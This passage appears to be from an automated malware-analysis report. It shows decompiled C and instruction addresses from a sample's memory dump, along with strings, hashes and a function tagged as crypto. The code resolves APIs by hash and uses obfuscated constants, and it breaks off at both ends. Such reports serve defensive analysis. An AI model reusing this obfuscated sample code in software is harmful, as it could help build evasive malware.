												E008B9670( &_v452, E008B9650( &_v452) + 0x10);
												E008B9640( &_v456, E008B9650( &_v456) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2876 = 0xe9fbf3a8;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v460, E008B9650( &_v460) + 0x10);
												E008B9640( &_v464, E008B9650( &_v464) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2884 = 0xbcd9ca71;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v468, E008B9650( &_v468) + 0x10);
												E008B9640( &_v472, E008B9650( &_v472) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x4faea65b;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v476, E008B9650( &_v476) + 0x10);
												E008B9640( &_v480, E008B9650( &_v480) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xc0b67de0;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v484, E008B9650( &_v484) + 0x10);
												E008B9640( &_v488, E008B9650( &_v488) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2908 = 0x996e050f;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v492, E008B9650( &_v492) + 0x10);
												E008B9640( &_v496, E008B9650( &_v496) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2916 = 0x81c9e4a7;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v500, E008B9650( &_v500) + 0x10);
												E008B9640( &_v504, E008B9650( &_v504) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x97abe05f;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v508, E008B9650( &_v508) + 0x10);
												E008B9640( &_v512, E008B9650( &_v512) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x82d274c4;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v516, E008B9650( &_v516) + 0x10);
												__eflags = E008B9650( &_v520) + 0xfffffff0;
												E008B9640( &_v520, E008B9650( &_v520) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("movups [eax], xmm0");
												E008C1270(0x588ab3ea,  &_v524);
												E008B9640( &_v524, 0x10);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x910], xmm0");
												E008B9640( &_v528, 0x20);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x918], xmm0");
												E008B9640( &_v532, 0x30);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x920], xmm0");
												E008B9640( &_v536, 0x40);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x928], xmm0");
												E008B9640( &_v540, 0x50);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x930], xmm0");
												E008B9640( &_v544, 0x60);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x938], xmm0");
												E008B9640( &_v548, 0x70);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x940], xmm0");
												E008B9640( &_v552, 0x80);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x948], xmm0");
												E008B9640( &_v556, 0x90);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x950], xmm0");
												E008B9640( &_v560, 0xa0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x958], xmm0");
												E008B9640( &_v564, 0xb0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x960], xmm0");
												E008B9640( &_v568, 0xc0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x968], xmm0");
												E008B9640( &_v572, 0xd0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x970], xmm0");
												E008B9640( &_v576, 0xe0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x978], xmm0");
												E008B9640( &_v580, 0xf0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x980], xmm0");
												E008B9640( &_v584, 0x100);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x988], xmm0");
												E008B9640( &_v588, 0);
												asm("movq xmm0, [eax+0x8]");
												_t819 =  &_v544;
												asm("movdqu [esp+0x60], xmm0");
												E008A0B70( &_v544, 0, 0x30);
												_t835 = _t838 + 0xc;
												asm("movd xmm4, edi");
												asm("cdq");
												asm("pxor xmm0, xmm0");
												asm("movdqu [eax-0x950], xmm0");
												_v2992 = _t803;
												asm("movd xmm1, edx");
												asm("cdq");
												asm("movd xmm3, eax");
												asm("punpckldq xmm4, xmm1");
												asm("movd xmm2, edx");
												asm("punpckldq xmm3, xmm2");
												asm("movdqu [esp+0x70], xmm3");
												asm("movdqu [eax-0x960], xmm4");
												_v2988 = _t595;
												do {
													asm("movdqu xmm0, [esp+0x60]");
													asm("movq [esp], xmm0");
													asm("pxor xmm5, xmm5");
													_v2860 = 6;
													asm("movdqu xmm1, [esp+0x80]");
													asm("movq [esp+0xc], xmm1");
													asm("movdqu xmm2, [esp+0x90]");
													asm("movq [esp+0x14], xmm2");
													asm("movq [esp+0x1c], xmm5");
													asm("movdqu xmm3, [esp+0x70]");
													asm("movq xmm4, [0x8c93d8]");
													asm("movq [esp+0x24], xmm3");
													asm("movq [esp+0x2c], xmm4");
													asm("movq [esp+0x34], xmm5");
													_t599 = E008C04B0(_t803, _t819);
													_t803 =  *(_t835 + 0x9e0);
													_t819 =  *((intOrPtr*)(_t835 + 0x9e4));
													asm("movq xmm0, [esp+0x9f8]");
													__eflags =  ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819;
													asm("movdqu xmm1, [esp+0x90]");
													asm("paddq xmm1, xmm0");
													asm("movdqu [esp+0x90], xmm1");
													if(( ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819) != 0) {
														goto L35;
													} else {
														_push(0x400);
														E008B9350( &_v356);
														 *(_t835 + 0x5c) = E008B9640(_t835 + 0x9d4, 0);
														 *((intOrPtr*)(_t835 + 0x58)) = E008B9640(_t835 + 0x9d4, 0);
														E008B9650( &_v368);
														asm("movdqu xmm0, [esp+0x60]");
														asm("movd xmm6, ecx");
														asm("movq [esp], xmm0");
														_v2872 = 6;
														asm("pxor xmm7, xmm7");
														asm("movdqu xmm1, [esp+0x80]");
														asm("movq xmm2, [0x8c93d0]");
														asm("movq [esp+0xc], xmm1");
														_v2860 = _t803;
														 *((intOrPtr*)(_t835 + 0x18)) = _t819;
														asm("movq [esp+0x1c], xmm2");
														asm("cdq");
														asm("movd xmm4, eax");
														asm("movd xmm3, edx");
														asm("cdq");
														asm("punpckldq xmm4, xmm3");
														asm("movq [esp+0x24], xmm4");
														asm("movd xmm5, edx");
														asm("punpckldq xmm6, xmm5");
														asm("movq [esp+0x2c], xmm6");
														asm("movq [esp+0x34], xmm7");
														_t562 = E008C04B0(_t803, _t819);
														__eflags = _t562;
														if(_t562 != 0) {
															L56:
															E008B9510(_t835 + 0x9d0);
															_t803 = 0xe5ab9b45;
														} else {
															__eflags =  *( *(_t835 + 0x5c)) & 0x0000ffff;
															if(__eflags == 0) {
																goto L56;
															} else {
																E008A83B0(_t835 + 0xa28);
																_t819 = _t835 + 0xa30;
																E008B2E60(_t835 + 0xa30, __eflags, _t835 + 0xa30, 0x5c);
																E008B1020(_t835 + 0xa30, _t835 + 0xa38);
																_t571 = E008BD620( *((intOrPtr*)(_t835 + 0xa38)), E008B6040( *((intOrPtr*)(_t835 + 0xa38)), 0x7fffffff));
																E008B0B10(_t835 + 0xa38);
																E008B0B10(_t835 + 0xa30);
																E008B0B10(_t835 + 0xa28);
																E008B9510( &_v372);
																_t803 = _t571 ^ 0x38ba5c7b;
																__eflags = _t803;
															}
														}
														__eflags = _t803 - 0xa1310f65;
														if(__eflags == 0) {
															_t803 =  *(_t835 + 0x50);
															_t595 =  *(_t835 + 0x54);
															_t820 =  *(_t835 + 0x9e0);
															 *((intOrPtr*)(_t835 + 0x58)) =  *((intOrPtr*)(_t835 + 0x9e4));
														} else {
															goto L35;
														}
													}
													L37:
													E0089DE60( &_v372, _t803, __eflags, _t820,  *((intOrPtr*)(_t835 + 0x58)));
													E008BA110( &_v396);
													 *((intOrPtr*)(_t835 + 0x40)) = 0xe2d27ff4;
													asm("pxor xmm0, xmm0");
													asm("movq [esp+0x48], xmm0");
													E008B9670( &_v396, E008B9650( &_v396) + 0x10);
													E008B9640( &_v400, E008B9650( &_v400) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													_v2820 = 0x69121530;
													asm("movq [esp+0x48], xmm1");
													E008B9670(_t835 + 0x9b4, E008B9650(_t835 + 0x9b0) + 0x10);
													E008B9640( &_v408, E008B9650( &_v408) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0x77be1f6;
													asm("movq [esp+0x48], xmm1");
													E008B9670( &_v412, E008B9650( &_v412) + 0x10);
													E008B9640( &_v416, E008B9650( &_v416) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0xf1c64384;
													asm("movq [esp+0x48], xmm1");
													E008B9670( &_v420, E008B9650( &_v420) + 0x10);
													__eflags = E008B9650(_t835 + 0x9b0) + 0xfffffff0;
													E008B9640(_t835 + 0x9b4, E008B9650(_t835 + 0x9b0) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													_push( &_v428);
													_push(_v2820);
													_push(_t820);
													asm("movups [edx], xmm0");
													E0089E780( &_v412, _t820, __eflags);
													E008B9640(_t835 + 0x9b4, 0);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x998], xmm0");
													E008B9640( &_v444, 0x10);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x9a0], xmm0");
													E008B9640( &_v448, 0x20);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x990], xmm0");
													E008B9640( &_v452, 0x30);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [ecx-0x18], xmm0");
													E008B9510(_t835 + 0x9c0);
													E008B9510( &_v456);
													asm("cdq");
													asm("movd xmm1, eax");
													asm("movd xmm0, edx");
													asm("cdq");
													asm("movd xmm3, eax");
													asm("punpckldq xmm1, xmm0");
													asm("movq [esp+0x900], xmm1");
													asm("movd xmm2, edx");
													asm("punpckldq xmm3, xmm2");
													asm("movq [esp+0x908], xmm3");
													E008B9710( &_v280, _t835 + 0x4c4, 0x4f0);
													_t785 = _t835 + 0xa58;
													_t370 = E0089ACD0(_t595, _t835 + 0xa58, __eflags, 0x5c8,  &_v288);
													goto L38;
													L35:
													__eflags = _t599;
												} while (_t599 == 0);
												_t820 = 0;
												__eflags = 0;
												_t803 =  *(_t835 + 0x50);
												_t595 =  *(_t835 + 0x54);
												 *((intOrPtr*)(_t835 + 0x58)) = 0;
												goto L37;
											}
											L38:
											_t817 = _t370;
											__eflags = _t817;
											if(_t817 != 0) {
												__eflags = _t595;
												_push(0);
												_t597 =  !=  ? _t595 + 0xc : _t595;
												_push( !=  ? _t595 + 0xc : _t595);
												_t387 = E008C1A80(_t785, _t595,  &_v296, 0x2710);
												_t835 = _t835 + 0x10;
												_t595 = 0;
												__eflags = _t387;
												_t817 =  !=  ? 0 : _t817;
											}
											__eflags = _v160;
											if(_v160 == 0) {
												L45:
												__eflags = _v156;
												if(_v156 == 0) {
													L50:
													E008C2530(_t595,  &_v296, _t785, _t803, _t817);
													E008B9510( &_v216);
													E008B9510(_t835 + 0xa50);
													E008B9510( &_v248);
													E008C1F40( &_v152, _t785, _t817);
													return _t817;
												} else {
													_t785 = E008A15C0(0x588ab3ea, 0xea812079);
													__eflags = _t785;
													if(_t785 != 0) {
														_t595 = 0;
														__eflags = 0;
														 *_t785(_t803, _v156, 0xffffffff,  &_v176, 0, 0, 1);
													}
													_t379 = E008A15C0(0x588ab3ea, 0x35b39b2b);
													__eflags = _t379;
													if(_t379 == 0) {
														goto L50;
													} else {
														_push(_v176);
														asm("int3");
														return _t379;
													}
												}
											} else {
												_t785 = E008A15C0(0x588ab3ea, 0xea812079);
												__eflags = _t785;
												if(_t785 != 0) {
													_t595 = 0;
													__eflags = 0;
													 *_t785(_t803, _v160, 0xffffffff,  &_v176, 0, 0, 1);
												}
												_t383 = E008A15C0(0x588ab3ea, 0x35b39b2b);
												__eflags = _t383;
												if(_t383 == 0) {
													goto L45;
												} else {
													_push(_v176);
													asm("int3");
													return _t383;
												}
											}
										} else {
											_t783 = _t833 + 0x4bc;
											 *_t621(0xffffffff, _v276, _t803, _t833 + 0x4bc, 0, 0, 2);
											__eflags = 0;
											if(0 == 0) {
												goto L26;
											} else {
												__eflags = _v196;
												if(_v196 != 0) {
													E008BBE30(_t833 + 0xa78, _t812);
												}
												__eflags = _v168;
												if(_v168 == 0) {
													goto L54;
												} else {
													_t585 = E008A15C0(0x588ab3ea, 0xea812079);
													__eflags = _t585;
													if(_t585 == 0) {
														_t586 = E008A15C0(0x588ab3ea, 0x35b39b2b);
														__eflags = _t586;
														if(_t586 == 0) {
															goto L54;
														} else {
															_push( *(_t833 + 0x40));
															asm("int3");
															return _t586;
														}
													} else {
														__eflags = 0;
														_push(1);
														_push(0);
														_push(0);
														_push(_t833 + 0x40);
														_push(0xffffffff);
														_push(_v168);
														_push(_t803);
														asm("int3");
														return _t585;
													}
												}
											}
										}
									} else {
										_t783 = _t833 + 0x4bc;
										 *_t620(0xffffffff, _v172, _t803, _t833 + 0x4bc, 0, 0, 2);
										__eflags = 0;
										if(0 == 0) {
											goto L17;
										} else {
											__eflags = _v196;
											if(_v196 != 0) {
												goto L53;
											} else {
											}
											goto L54;
										}
									}
								} else {
									_push(_v160);
									_push(0xffffffff);
									asm("int3");
									return _t329;
								}
							}
						} else {
							__eflags = _v128;
							if(_v128 != 0) {
								L53:
								E008BBE30(_t833 + 0xa78, _t812);
							} else {
							}
							L54:
							E008C2530(_t595, _t833 + 0xa10, _t783, _t803, _t812);
							E008B9510( &_v224);
							E008B9510( &_v240);
							E008B9510(_t833 + 0xa40);
							E008C1F40( &_v160, _t783, _t812);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = 0;
						_push(0);
						_push(0x8000000);
						_push(4);
						_push(_t833 + 0xa90);
						_push(0);
						_push(0xf001f);
						_push(_t833 + 0xaa4);
						asm("int3");
						return _t317;
					}
				} else {
					E008C1F40( &_v72, 0x1d, _t812);
					return 1;
				}
			}

0x00891571
0x00891577
0x00891579
0x0089157f
0x00891581
0x00891592
0x00891597
0x008915a7
0x008915b3
0x008915c8
0x008915e8
0x008915f1
0x008915f6
0x008915ff
0x00891604
0x0089160d
0x00891612
0x00891614
0x00891617
0x0089161a
0x0089161f
0x00891621
0x00891625
0x0089162a
0x0089162a
0x0089162f
0x00891631
0x00891634
0x00891639
0x0089163a
0x00891642
0x00891644
0x00891649
0x00891654
0x00891658
0x00891660
0x00891670
0x00891681
0x00891686
0x00891688
0x008916b2
0x008916c8
0x008916cd
0x008916d2
0x008916e9
0x008916f0
0x008916f7
0x008916fe
0x00891714
0x00891716
0x00891718
0x008926f9
0x008926fd
0x00892701
0x00892706
0x0089270c
0x00892737
0x0089273b
0x0089273d
0x0089273f
0x00000000
0x00892745
0x00892745
0x0089274d
0x00000000
0x00000000
0x00000000
0x0089274d
0x0089171e
0x0089171e
0x00891727
0x0089173e
0x00891743
0x00891750
0x00891755
0x00891757
0x00891764
0x0089177e
0x00891780
0x00891782
0x008917b5
0x008917bc
0x008917d2
0x008917d4
0x008917d6
0x0089186a
0x00891871
0x00891878
0x00891880
0x00891889
0x00891889
0x00891895
0x008918a2
0x008918a4
0x008918a7
0x008918b0
0x008918c3
0x008918cf
0x008918e8
0x008918fb
0x00891912
0x00891917
0x0089191c
0x00891921
0x00891924
0x008927e7
0x008927ec
0x008927f6
0x008927fd
0x00892817
0x0089282d
0x00892843
0x00892859
0x0089286f
0x00892885
0x0089289b
0x008928b1
0x008928c7
0x008928dd
0x008928f3
0x00892909
0x0089291f
0x00892935
0x0089294b
0x00892961
0x00892977
0x0089298d
0x008929a3
0x008929b4
0x008929c0
0x008929ce
0x008929d5
0x008929ed
0x008929fb
0x008929fc
0x00892a01
0x00892a08
0x0089192a
0x00891939
0x0089193e
0x00891948
0x00891956
0x00891960
0x00891962
0x00891967
0x00891976
0x0089197a
0x00891990
0x008919ac
0x008919b1
0x008919bd
0x008919c1
0x008919c4
0x008919cc
0x008919e2
0x008919fe
0x00891a03
0x00891a0f
0x00891a13
0x00891a16
0x00891a1e
0x00891a34
0x00891a50
0x00891a55
0x00891a61
0x00891a65
0x00891a68
0x00891a70
0x00891a86
0x00891aa2
0x00891aa7
0x00891ab3
0x00891ab7
0x00891aba
0x00891ac2
0x00891ad8
0x00891af4
0x00891af9
0x00891b05
0x00891b09
0x00891b0c
0x00891b14
0x00891b2a
0x00891b46
0x00891b4b
0x00891b57
0x00891b5b
0x00891b5e
0x00891b66
0x00891b7c
0x00891b98
0x00891b9d
0x00891ba9
0x00891bad
0x00891bb0
0x00891bb8
0x00891bce
0x00891bea
0x00891bef
0x00891bfb
0x00891bff
0x00891c02
0x00891c0a
0x00891c20
0x00891c3c
0x00891c41
0x00891c4d
0x00891c51
0x00891c54
0x00891c5c
0x00891c72
0x00891c8e
0x00891c93
0x00891c9f
0x00891ca3
0x00891ca6
0x00891cae
0x00891cc4
0x00891ce0
0x00891ce5
0x00891cf1
0x00891cf5
0x00891cf8
0x00891d00
0x00891d16
0x00891d32
0x00891d37
0x00891d43
0x00891d47
0x00891d4a
0x00891d52
0x00891d68
0x00891d84
0x00891d89
0x00891d95
0x00891d99
0x00891d9c
0x00891da4
0x00891dba
0x00891dd6
0x00891ddb
0x00891de7
0x00891deb
0x00891dee
0x00891df6
0x00891e0c
0x00891e28
0x00891e2d
0x00891e39
0x00891e3d
0x00891e40
0x00891e48
0x00891e5e
0x00891e7a
0x00891e7f
0x00891e8b
0x00891e8f
0x00891e92
0x00891e9a
0x00891eb0
0x00891ec1
0x00891ecc
0x00891ed1
0x00891ee2
0x00891ee5
0x00891ef3
0x00891ef8
0x00891efd
0x00891f0f
0x00891f14
0x00891f19
0x00891f2b
0x00891f30
0x00891f35
0x00891f47
0x00891f4c
0x00891f51
0x00891f63
0x00891f68
0x00891f6d
0x00891f7f
0x00891f84
0x00891f89
0x00891f9b
0x00891fa0
0x00891fa5
0x00891fba
0x00891fbf
0x00891fc4
0x00891fd9
0x00891fde
0x00891fe3
0x00891ff8
0x00891ffd
0x00892002
0x00892017
0x0089201c
0x00892021
0x00892036
0x0089203b
0x00892040
0x00892055
0x0089205a
0x0089205f
0x00892074
0x00892079
0x0089207e
0x00892093
0x00892098
0x0089209d
0x008920b2
0x008920b7
0x008920bc
0x008920ce
0x008920d3
0x008920d8
0x008920df
0x008920ea
0x008920ef
0x008920f4
0x008920f8
0x008920f9
0x00892104
0x0089210c
0x00892110
0x00892114
0x00892115
0x00892119
0x0089211d
0x00892121
0x00892125
0x0089212b
0x00892133
0x00892137
0x00892137
0x0089213d
0x00892142
0x00892146
0x0089214e
0x00892157
0x0089215d
0x00892166
0x0089216c
0x00892172
0x00892178
0x00892180
0x00892186
0x0089218c
0x00892197
0x008921ab
0x008921b4
0x008921bd
0x008921c6
0x008921c8
0x008921d1
0x008921d5
0x008921de
0x00000000
0x008921e4
0x008921e4
0x008921f0
0x00892203
0x00892215
0x00892220
0x00892227
0x0089222d
0x00892231
0x00892236
0x0089223e
0x00892242
0x0089224b
0x00892253
0x00892259
0x0089225d
0x00892261
0x0089226b
0x0089226c
0x00892272
0x00892276
0x00892277
0x0089227b
0x00892281
0x00892285
0x00892289
0x0089228f
0x00892295
0x0089229a
0x0089229c
0x008927c5
0x008927cc
0x008927d1
0x008922a2
0x008922a9
0x008922ab
0x00000000
0x008922b1
0x008922bb
0x008922c0
0x008922d1
0x008922e0
0x008922fc
0x0089230a
0x00892311
0x0089231d
0x00892329
0x0089232e
0x0089232e
0x0089232e
0x008922ab
0x00892334
0x0089233a
0x008927ad
0x008927b1
0x008927b5
0x008927bc
0x00000000
0x00000000
0x00000000
0x0089233a
0x00892356
0x00892364
0x00892370
0x00892375
0x00892384
0x00892388
0x0089239e
0x008923ba
0x008923bf
0x008923cb
0x008923cf
0x008923d2
0x008923da
0x008923f0
0x0089240c
0x00892411
0x0089241d
0x00892421
0x00892424
0x0089242c
0x00892442
0x0089245e
0x00892463
0x0089246f
0x00892473
0x00892476
0x0089247e
0x00892494
0x008924a5
0x008924b0
0x008924b7
0x008924c3
0x008924c4
0x008924c8
0x008924c9
0x008924d5
0x008924e3
0x008924e8
0x008924ed
0x008924ff
0x00892504
0x00892509
0x0089251b
0x00892520
0x00892525
0x00892537
0x0089253c
0x00892548
0x0089254d
0x00892559
0x00892565
0x00892566
0x00892571
0x00892575
0x00892576
0x0089257a
0x0089257e
0x00892587
0x0089258b
0x0089258f
0x008925ac
0x008925c0
0x008925c7
0x00000000
0x00892340
0x00892340
0x00892340
0x00892348
0x00892348
0x0089234a
0x0089234e
0x00892352
0x00000000
0x00892352
0x008925cc
0x008925cc
0x008925d0
0x008925d2
0x008925d4
0x008925d9
0x008925db
0x008925de
0x008925ec
0x008925f1
0x008925f4
0x008925f6
0x008925f8
0x008925f8
0x008925fb
0x00892603
0x00892650
0x00892650
0x00892658
0x008926a5
0x008926ac
0x008926b8
0x008926c4
0x008926d0
0x008926dc
0x008926ef
0x0089265a
0x00892669
0x0089266b
0x0089266d
0x0089266f
0x0089266f
0x00892687
0x00892687
0x00892693
0x00892698
0x0089269a
0x00000000
0x0089269c
0x0089269c
0x008926a3
0x008926a4
0x008926a4
0x0089269a
0x00892605
0x00892614
0x00892616
0x00892618
0x0089261a
0x0089261a
0x00892632
0x00892632
0x0089263e
0x00892643
0x00892645
0x00000000
0x00892647
0x00892647
0x0089264e
0x0089264f
0x0089264f
0x00892645
0x008917dc
0x008917de
0x008917f4
0x008917f6
0x008917f8
0x00000000
0x008917fa
0x008917fa
0x00891802
0x0089180b
0x0089180b
0x00891810
0x00891818
0x00000000
0x0089181e
0x00891828
0x0089182d
0x0089182f
0x00891852
0x00891857
0x00891859
0x00000000
0x0089185f
0x0089185f
0x00891863
0x00891864
0x00891864
0x00891831
0x00891831
0x00891837
0x00891839
0x0089183a
0x0089183b
0x0089183c
0x0089183e
0x00891845
0x00891846
0x00891847
0x00891847
0x0089182f
0x00891818
0x008917f8
0x00891784
0x00891786
0x0089179c
0x0089179e
0x008917a0
0x00000000
0x008917a2
0x008917a2
0x008917aa
0x00000000
0x00000000
0x008917b0
0x00000000
0x008917aa
0x008917a0
0x00891759
0x00891759
0x00891760
0x00891762
0x00891763
0x00891763
0x00891757
0x008916d4
0x008916d4
0x008916dc
0x0089274f
0x00892756
0x00000000
0x008916e2
0x0089275b
0x00892762
0x0089276e
0x0089277a
0x00892786
0x00892792
0x00892797
0x008927a5
0x008927a5
0x0089168a
0x0089168a
0x00891693
0x00891694
0x00891699
0x0089169b
0x0089169c
0x0089169d
0x008916a9
0x008916aa
0x008916ab
0x008916ab
0x008915ca
0x008915d1
0x008915e7
0x008915e7

Strings

)8GV, xrefs: 00891956
)8GV, xrefs: 008927FD

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: )8GV$)8GV
API String ID: 0-993736920
Opcode ID: 3eb7467de9343e9cba9f77d905459760d1f7d986095d34735b983cbd6809c9bc
Instruction ID: ea73030e01277216405fb35bdd21f8681018ce62e58dfe9382ace2f228e39701
Opcode Fuzzy Hash: 3eb7467de9343e9cba9f77d905459760d1f7d986095d34735b983cbd6809c9bc
Instruction Fuzzy Hash: F0A23F719187819AE721EB68C952BEFB3A4FFE3310F044A1DF68996292EF306544C753

Uniqueness

Uniqueness Score: -1.00%

Function 0089ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E0089ACD0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v192;
				char _v196;
				char _v200;
				char _v216;
				char _v220;
				char _v232;
				char _v248;
				void* _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				void* _v276;
				char _v280;
				signed int _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int _v304;
				char _v308;
				char _v312;
				char _v316;
				signed int _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _v364;
				char _v368;
				void* _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				void* _v440;
				char _v444;
				void* _v448;
				char _v452;
				char _v460;
				intOrPtr _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				char _v480;
				void* _v484;
				void* _v488;
				intOrPtr _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				intOrPtr _v508;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void* _v548;
				intOrPtr _v552;
				void* _v556;
				char _v560;
				signed short* _v564;
				signed int _v568;
				signed int _v572;
				char _v576;
				intOrPtr _v580;
				signed int _v584;
				void* _v588;
				void* _v592;
				void* _v596;
				char _v604;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v636;
				intOrPtr _v640;
				char _v644;
				void* _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v676;
				signed int _v680;
				intOrPtr _v700;
				void* _v704;
				void* _v708;
				void* _v716;
				intOrPtr _v724;
				intOrPtr _v732;
				signed int _v736;
				signed int _v740;
				intOrPtr _v744;
				void* _v748;
				void* _v756;
				void* _v764;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				void* _v788;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v856;
				void* _v860;
				void* _v868;
				void* _v872;
				void* _v876;
				void* _v880;
				void* _v888;
				void* _v892;
				void* _v908;
				void* _v940;
				void* _v944;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t632;
				void* _t667;
				signed int _t672;
				char _t747;
				signed int _t768;
				signed int _t770;
				signed int _t778;
				char* _t781;
				signed int _t782;
				signed int _t793;
				signed int _t795;
				char* _t798;
				signed int _t799;
				signed int _t810;
				signed int _t812;
				signed int _t813;
				signed int _t815;
				intOrPtr _t865;
				intOrPtr _t900;
				signed int _t911;
				char _t974;
				signed char* _t1005;
				signed int _t1006;
				void* _t1008;
				void* _t1011;
				intOrPtr _t1017;
				signed int _t1021;
				char _t1030;
				char _t1035;
				signed int _t1036;
				char* _t1038;
				signed int _t1040;
				signed int _t1041;
				signed int* _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				void* _t1055;
				void* _t1065;
				char* _t1154;
				signed int _t1326;
				signed short* _t1435;
				void* _t1438;
				char* _t1449;
				char* _t1452;
				signed int _t1455;
				signed int _t1457;
				signed int _t1459;
				signed int _t1460;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1481;
				void* _t1485;
				signed int _t1487;
				char _t1498;
				void* _t1499;
				void* _t1500;
				char _t1503;
				void* _t1514;
				void* _t1518;
				char _t1531;
				signed int _t1537;
				signed int _t1538;
				signed int _t1539;
				char _t1540;
				intOrPtr _t1542;
				signed int _t1543;
				signed int _t1545;
				void* _t1547;
				void* _t1567;
				void* _t1569;
				signed int _t1570;
				void* _t1572;
				void* _t1573;
				void* _t1574;
				void* _t1576;

				_t1572 = (_t1570 & 0xfffffff0) - 0x254;
				_v540 = __edx;
				_v28 = __ecx;
				_t1534 =  *((intOrPtr*)(__ecx + 0xc));
				E008A15C0(0x57325ee3, 0xb7186560);
				_push(0);
				E008B9350( &_v192);
				_v180 = 0;
				_push(0);
